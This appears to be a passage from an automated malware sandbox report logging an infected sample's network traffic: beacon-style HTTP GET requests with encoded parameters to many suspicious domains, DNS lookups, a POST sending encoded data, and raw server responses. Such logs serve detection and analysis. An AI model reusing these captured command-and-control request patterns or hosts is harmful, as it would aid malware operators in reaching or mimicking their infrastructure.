                      Source: global trafficHTTP traffic detected: GET /v70f/?aNXP_jw=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5idFlByfp0+7vcrnzlNMGRBRFmOTNFNBZSGoPe8m8L5uZEU1B7gQA=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.spectre.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /6sgf/?aNXP_jw=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXRZ3rjMrHC/Gv/9ocmuyHMrUIRIkrN1ClkKvdCmOBXovMxeC3un8=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.synd.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /ohf8/?aNXP_jw=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqC7Yr6zshBBR6fmx5Fk8+3pxn0VniOhKvc7yUqYSWiUeq1UgZ2CQ=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /gofy/?cTT8u=Q4NHoHJ0&aNXP_jw=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iVQqerNi8ibzmajOWyGUvPjo8vNYMiNR/EtvLRStZKR6xKR5Vua8= HTTP/1.1Host: www.wiretap.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /5l50/?aNXP_jw=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBniTm4i15yEbcTUEwFf3HznLV4DES1syv5vrWOVY80sCIfmhGQOLBk=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.it2sp8.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /cvmn/?cTT8u=Q4NHoHJ0&aNXP_jw=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+roKiKfYRZRlDdOZb7PAuefTsxfeJpJgY665Liw0ad36KrhrX4mzY= HTTP/1.1Host: www.cbprecise.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /tjfd/?aNXP_jw=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6khQdikIhy+mltUDrCuC1oSKa8QDC2XrbIZdN6oN7Umup+JrtMVA=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.yun08ps.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /mbcs/?cTT8u=Q4NHoHJ0&aNXP_jw=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dpm6junvogZRuLkUhLJLqNe6fCvA+b04RO+uOFUQ6tBhUgoCpKJY= HTTP/1.1Host: www.rtpsilva4d.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /jm9b/?aNXP_jw=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVzgDaP4LABx1lqbBfrXRaislputLbkLl7Cj+NmRWLfbOqf/tiSO58=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.restobarbebek.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /w21a/?cTT8u=Q4NHoHJ0&aNXP_jw=LZR+ZfxbvtNDeEpFHDBOAnNQReD6jdenS5faavQJiaR4jsC5ZvEsJscNWNTIhM6XzOFPLAXSOfmv47Q4tyBC+fdx4nmbPqtD38XQudBSIRIiqzdGLKpTAxO37HRkObotKIbjEro= HTTP/1.1Host: www.nagasl89.babyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficDNS traffic detected: DNS query: www.sidqwdf.fun
                      Source: global trafficDNS traffic detected: DNS query: www.swenansiansie.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.mp3cevir.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.spectre.center
                      Source: global trafficDNS traffic detected: DNS query: www.synd.fun
                      Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
                      Source: global trafficDNS traffic detected: DNS query: www.wiretap.digital
                      Source: global trafficDNS traffic detected: DNS query: www.it2sp8.vip
                      Source: global trafficDNS traffic detected: DNS query: www.cbprecise.online
                      Source: global trafficDNS traffic detected: DNS query: www.yun08ps.top
                      Source: global trafficDNS traffic detected: DNS query: www.rtpsilva4d.click
                      Source: global trafficDNS traffic detected: DNS query: www.restobarbebek.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.nagasl89.baby
                      Source: global trafficDNS traffic detected: DNS query: www.themessageart.online
                      Source: unknownHTTP traffic detected: POST /08fk/ HTTP/1.1Host: www.swenansiansie.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.swenansiansie.xyzReferer: http://www.swenansiansie.xyz/08fk/Content-Length: 212Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)Data Raw: 61 4e 58 50 5f 6a 77 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 53 78 76 32 2b 49 4c 6c 33 45 52 38 4f 58 44 4f 70 4b 6a 58 72 54 61 58 50 66 74 61 74 50 64 64 35 30 6f 6b 6c 32 32 35 72 74 4e 72 6c 77 77 78 62 33 6f 72 77 4d 4b 78 34 61 30 69 6e 4d 4b 45 4f 44 78 6a 37 53 4a 2f 64 33 38 47 2b 4c 30 32 53 45 32 4e 4c 53 51 70 69 50 42 38 7a 59 34 4e 76 75 56 6f 6e 64 48 66 6d 4c 79 68 68 42 31 61 4d 6d 31 48 76 39 38 2f 31 47 6e 77 59 64 61 7a 61 44 49 49 46 63 6d 6e 75 62 51 62 38 50 76 68 68 71 73 74 55 79 4b 46 4e 54 50 53 32 79 34 61 76 43 57 75 33 31 2f 33 41 5a 33 64 57 30 56 57 6a 6d 6f 51 79 67 37 49 63 2b 33 61 5a 56 54 Data Ascii: aNXP_jw=9MVRUBQD0iJJgSxv2+ILl3ER8OXDOpKjXrTaXPftatPdd50okl225rtNrlwwxb3orwMKx4a0inMKEODxj7SJ/d38G+L02SE2NLSQpiPB8zY4NvuVondHfmLyhhB1aMm1Hv98/1GnwYdazaDIIFcmnubQb8PvhhqstUyKFNTPS2y4avCWu31/3AZ3dW0VWjmoQyg7Ic+3aZVT
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 02 Dec 2024 13:37:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 02 Dec 2024 13:38:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 02 Dec 2024 13:38:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 02 Dec 2024 13:38:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 13:38:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 b5 cd 33 ce a9 5d 2f e8 84 bb 76 12 49 b7 bf c1 03 de 0a 65 47 34 04 78 76 13 2f 0c 2a d5 6b 7b 6b a7 9c 33 5b 5b cd 33 4e dd c9 88 64 c4 44 18 f8 18 de 28 2d 26 53 29 3b 03 19 78 db 2a 4e ec cb 71 b9 5a c2 78 15 45 61 f4 94 13 6a 62 15 73 e2 c8 6d 94 4c 42 d0 46 ae dd 51 b2 cd da 7d 66 be c8 54 a0 30 92 48 fc d4 bc cd 4f 32 f9 9b eb 3b 89 47 47 db 69 3b ec 8c 73 8b 6e 5b 43 e8 4a e8 af 16 a9 af 95 59 29 b7 b1 bd 4e 9f 5a ed 6e cb f7 ba bd 04 f6 40 b4 54 64 d2 e1 c1 ad 56 d6 41 24 67 5a 34 f5 cc d6 3b de ce d2 a9 56 10 26 c4 52 a2 ae 60 a1 f4 eb f4 28 7d 94 1e a4 8f 45 fa 5d ba 3f f9 10 8f f7 d2 c3 c9 47 93 1b 78 3e c4 df 51 7a 37 dd a7 ee bb 2b 41 3b 1e ae d5 e1 85 da 5f db 16 59 6d 6e ab bd 24 19 c6 17 1c 07 4e 67 c3 6d b5 33 04 e1 76 e8 fb e1 ae 08 c2 70 a8 60 25 78 80 1f c0 5a 54 04 7b 96 51 97 9c b9 d5 86 b7 f7 c1 cc 5f 69 75 7b f2 e1 e4 66 dd 91 cd ba 83 7d 34 eb 73 9b e9 aa 56 2b f3 70 6b 37 92 c3 21 88 66 02 9e 6f 6f b1 2f b6 e0 0b 80 83 a5 83 58 2d bd 30 4e 00 1e 56 9c c8 c4 73 a1 80 b9 55 67 64 6d 65 eb 93 9e 56 a7 d2 98 d3 88 c5 d0 50 9a c3 8b de 6a b3 3e 5c 3e a7 a3 b4 f5 c2 45 9f 5d 47 f5 76 d4 4c 0f b5 9a d2 1f 48 7f e9 0f ac d3 07 c7 b4 38 23 ea e1 b2 ed b6 47 49 12 06 71 2e 67 ec d7 50 be ee 04 97 fa 01 c2 f7 c3 a8 c5 da 55 81 4b 26 96 75 c4 de 55 d5 82 de 07 d2 67 25 64 b2 2c e6 17 72 cb c6 b3 42 80 c1 06 89 a1 ec 74 a0 9e 96 4f 16 33 6f 71 04 c8 da ea 9c dd 5e e8 c5 ce ba db 53 6e bf b1 d2 e1 c0 60 e2 f5 8a 1c 0c d7 30 b6 15 87 a3 c8 55 8d 7c 69 42 e2 52 f3 37 34 9b 2c 4f 98 fb 24 47 31 f9 66 a8 36 fc ef e4 7d 74 c2 81 f4 0a 40 cf 9d c4 60 59 0f 70 02 b5 eb ac 8f 92 41 ce d9 0c d7 d4 4e b1 64 34 c8 39 5e a1 26 17 bb 91 5e 37 68 c4 10 4c d0 69 81 c6 c9 1b 4c ff 0e 43 f8 4f 7a 20 26 9f a4 47 93 4f 27 37 45 7a 3f f7 ff d3 86 cb c5 43 19 2c b0 d1 61 14 0e 42 8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 13:38:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 b5 cd 33 ce a9 5d 2f e8 84 bb 76 12 49 b7 bf c1 03 de 0a 65 47 34 04 78 76 13 2f 0c 2a d5 6b 7b 6b a7 9c 33 5b 5b cd 33 4e dd c9 88 64 c4 44 18 f8 18 de 28 2d 26 53 29 3b 03 19 78 db 2a 4e ec cb 71 b9 5a c2 78 15 45 61 f4 94 13 6a 62 15 73 e2 c8 6d 94 4c 42 d0 46 ae dd 51 b2 cd da 7d 66 be c8 54 a0 30 92 48 fc d4 bc cd 4f 32 f9 9b eb 3b 89 47 47 db 69 3b ec 8c 73 8b 6e 5b 43 e8 4a e8 af 16 a9 af 95 59 29 b7 b1 bd 4e 9f 5a ed 6e cb f7 ba bd 04 f6 40 b4 54 64 d2 e1 c1 ad 56 d6 41 24 67 5a 34 f5 cc d6 3b de ce d2 a9 56 10 26 c4 52 a2 ae 60 a1 f4 eb f4 28 7d 94 1e a4 8f 45 fa 5d ba 3f f9 10 8f f7 d2 c3 c9 47 93 1b 78 3e c4 df 51 7a 37 dd a7 ee bb 2b 41 3b 1e ae d5 e1 85 da 5f db 16 59 6d 6e ab bd 24 19 c6 17 1c 07 4e 67 c3 6d b5 33 04 e1 76 e8 fb e1 ae 08 c2 70 a8 60 25 78 80 1f c0 5a 54 04 7b 96 51 97 9c b9 d5 86 b7 f7 c1 cc 5f 69 75 7b f2 e1 e4 66 dd 91 cd ba 83 7d 34 eb 73 9b e9 aa 56 2b f3 70 6b 37 92 c3 21 88 66 02 9e 6f 6f b1 2f b6 e0 0b 80 83 a5 83 58 2d bd 30 4e 00 1e 56 9c c8 c4 73 a1 80 b9 55 67 64 6d 65 eb 93 9e 56 a7 d2 98 d3 88 c5 d0 50 9a c3 8b de 6a b3 3e 5c 3e a7 a3 b4 f5 c2 45 9f 5d 47 f5 76 d4 4c 0f b5 9a d2 1f 48 7f e9 0f ac d3 07 c7 b4 38 23 ea e1 b2 ed b6 47 49 12 06 71 2e 67 ec d7 50 be ee 04 97 fa 01 c2 f7 c3 a8 c5 da 55 81 4b 26 96 75 c4 de 55 d5 82 de 07 d2 67 25 64 b2 2c e6 17 72 cb c6 b3 42 80 c1 06 89 a1 ec 74 a0 9e 96 4f 16 33 6f 71 04 c8 da ea 9c dd 5e e8 c5 ce ba db 53 6e bf b1 d2 e1 c0 60 e2 f5 8a 1c 0c d7 30 b6 15 87 a3 c8 55 8d 7c 69 42 e2 52 f3 37 34 9b 2c 4f 98 fb 24 47 31 f9 66 a8 36 fc ef e4 7d 74 c2 81 f4 0a 40 cf 9d c4 60 59 0f 70 02 b5 eb ac 8f 92 41 ce d9 0c d7 d4 4e b1 64 34 c8 39 5e a1 26 17 bb 91 5e 37 68 c4 10 4c d0 69 81 c6 c9 1b 4c ff 0e 43 f8 4f 7a 20 26 9f a4 47 93 4f 27 37 45 7a 3f f7 ff d3 86 cb c5 43 19 2c b0 d1 61 14 0e 42 8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 13:38:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 b5 cd 33 ce a9 5d 2f e8 84 bb 76 12 49 b7 bf c1 03 de 0a 65 47 34 04 78 76 13 2f 0c 2a d5 6b 7b 6b a7 9c 33 5b 5b cd 33 4e dd c9 88 64 c4 44 18 f8 18 de 28 2d 26 53 29 3b 03 19 78 db 2a 4e ec cb 71 b9 5a c2 78 15 45 61 f4 94 